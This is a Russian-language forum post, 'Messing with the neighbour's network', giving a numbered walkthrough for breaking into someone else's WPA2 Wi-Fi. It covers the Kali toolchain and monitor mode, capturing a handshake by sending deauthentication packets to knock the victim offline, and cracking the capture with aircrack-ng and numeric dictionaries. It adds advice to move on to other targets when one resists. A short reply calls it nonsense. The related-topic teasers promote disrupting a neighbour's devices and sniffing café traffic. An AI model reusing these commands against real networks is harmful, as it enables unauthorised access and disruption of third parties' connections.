Хулиганим с сетью соседа

sleepwalker_user

Пассажир
Сообщения
17
Реакции
15
Оборудование: ноутбук с установленной операционной системой «Kali Linux/ Parrot Security OS», внешний WiFi-адаптер «Alfa AWUS036NHA» + направленная антенна.

Взлом WPA2 (Handshake):



1. iwconfig - Определение названия WiFi-адаптера (в моём случае это - wlx00c0ca982c7d. Чтобы на 100% быть уверенным, вытащите usb кабель WiFi-адаптера из разъёма и повторите ту же команду, если какой-либо из адаптеров исчез из списка, значит это именно он. Затем снова подключите WiFi-адаптер и продолжайте следовать инструкциям).
587_original.png

2. airmon-ng check kill - Убить все лишние процессы WiFi-адаптера
996_original.png

3. airmon-ng start wlx00c0ca982c7d - Включить режим монитора (при повторном введении команды "iwconfig", в выводе появится "wlan0mon", это означает, что WiFi-адаптер теперь будет работать в режиме мониторинга пакетов)
1233_original.png

4. airodump-ng wlan0mon - Сканирование сетей
1348_original.png

1647_original.png

1855_original.png

2271_original.png

5. airodump-ng --bssid MAC_ТОЧКИ_ДОСТУПА --channel КАНАЛ_ТОЧКИ_ДОСТУПА -w ПУТЬ_К_ПАПКЕ_ДЛЯ_СОХРАНЕНИЯ_HANDSHAKE wlan0mon
2374_original.png

2808_original.png

6. Открыть новую вкладку в терминале и ввести команду (предыдущую вкладку не закрывать): aireplay-ng --deauth 30 -a MAC_ТОЧКИ_ДОСТУПА -c MAC_КЛИЕНТСКОГО_УСТРОЙСТВА wlan0mon - Отправка пакетов деавторизации (принудительное отключение жертвы от WiFi), "HandShake" будет перехвачен автоматически и появится в папке которую мы указывали ранее.
2970_original.png

7. После перехвата т.н. "HandShake" в папке окажется много файлов, но нам нужны лишь те, что с расширением ".cap"
3084_original.png

8. wpaclean ПУТЬ_К_ФАЙЛУ_ДЛЯ_СОХРАНЕНИЯ_ОЧИЩЕННОГО_HANDSHAKE.cap ПУТЬ_К_ИСХОДНОМУ_ФАЙЛУ_HANDSHAKE.cap
3415_original.png

9. Для дальнейших манипуляций потребуется словарь для брутфорса файла "HandShake", можно скачать готовый словарь из сети (Github, по запросу: "Password Dictionary"), а можно создать свой, заточенный под вашу цель, существуют специальные утилиты (всё это найти можно на Github). По личному опыту могу сказать что у подавляющего большинства юзеров пароли от WiFi состоят лишь из чисел (номера телефонов, даты рождений - различные вариации), при этом в минимально необходимое кол-во символов (8), если вы прошлись по числовому словарю брутфорсом и ничего не получили - бросайте эту затею и пробуйте ломать другой (берите количеством, нет смысла колупать один на протяжении недели, "Время - золото").



10. aircrack-ng -w ПУТЬ_К_СЛОВАРЮ -b MAC_ТОЧКИ_ДОСТУПА ПУТЬ_К_ОЧИЩЕННОММУ_HANDSHAKE.cap
3623_original.png

3956_original.png

11. И, о чудо, результате всех этих действий: "KEY FOUND! [ 001122334455 ]"
 
херня полная, зачем это делать?
 

Похожие темы

Итак, после того, как мы научились мониторить подключённые устройства к чужому роутеру, возникает резонный вопрос: чем бы нам ещё напакостить тому самому Витьку из 666 квартиры? А вот чем: отключим все устройства от интернета до тех пор, пока Витёк не осознает свою ошибку и не приползёт на...
Ответы
11
Просмотры
Ты сидишь в кафе, подключаешься к Wi-Fi, открываешь телегу. Рядом за столиком человек с ноутбуком делает то же самое — только он параллельно читает твой трафик, перехватывает куки и собирает хеши паролей от корпоративных сетей в радиусе ста метров. Ему не нужен физический доступ к роутеру, не...
Ответы
14
Просмотры
398
LINUX не всем по зубам, но причастным к даркнету следует сделать невозможное и пересесть на эту ОС, выбрав дистрибутив по душе, поверьте - будет проще, чем кажется на первый взгляд. Есть тип атак который не доступен из windows и поэтому нам нужно подготовить одну из сборок заточенных под...
Ответы
32
Просмотры
Die Cyber Wochenschau 2 - взлом WEP - разбор реальной ezpz атаки. Взять WEP точку ненамного престижней, чем украсть пароль "лоховоровайкой" - атакой EVIL TWIN. Но ради интереса и опыта я сегодня с утреца решил таки проверить так ли все там просто. На все про все ушло чуть более 30 минут, из...
Ответы
2
Просмотры
Die Deutsche Cyber Wochenschau - взлом WPA/WPA2 PSK через уязвимость WPS - разбор реальной атаки. Взлом роутера как известно возможно реализовать тремя основными стратегиями: 1. Через брутфорс или атаку по словарю 4-way-handshake 2. Через брутфорс пина Wifi Protected Setup (WPS) 3. Через лоха...
Ответы
18
Просмотры
19К
Назад
Сверху Снизу